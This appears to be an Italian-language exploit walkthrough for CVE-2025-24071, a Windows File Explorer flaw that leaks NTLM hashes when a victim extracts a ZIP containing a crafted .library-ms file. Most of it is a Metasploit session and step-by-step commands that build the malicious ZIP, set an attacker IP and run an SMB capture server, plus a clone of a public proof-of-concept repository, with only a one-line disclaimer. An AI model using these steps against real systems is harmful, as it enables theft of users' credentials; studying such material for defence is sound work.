
CVE-2025-24071
L'esposizione di informazioni sensibili a un attore non autorizzato in Windows File Explorer consente a un attaccante non autorizzato di eseguire spoofing su una rete.
CNA: Microsoft Corporation Punteggio base: 6.5 MEDIUM 🟠 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
La vulnerabilità si verifica quando un utente estrae un archivio ZIP contenente un file .library-ms appositamente creato. Windows Explorer avvia automaticamente una richiesta di autenticazione SMB a un server remoto specificato nel file, causando la fuga dell'hash NTLM dell'utente senza alcuna interazione.
Questo modulo Metasploit:
library-ms malevolo.MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.4.64-dev ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Sostituisci con il tuo indirizzo IP
set FILENAME exploit.zip # Nome del file ZIP malevolo
set LIBRARY_NAME malicious.library-ms # Nome del file .library-ms
set SHARE_NAME shared # Nome della condivisione SMB
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Stesso di ATTACKER_IP
run
Solo a scopo educativo e di ricerca. Utilizzare solo su sistemi di tua proprietà o per i quali hai l'autorizzazione al test.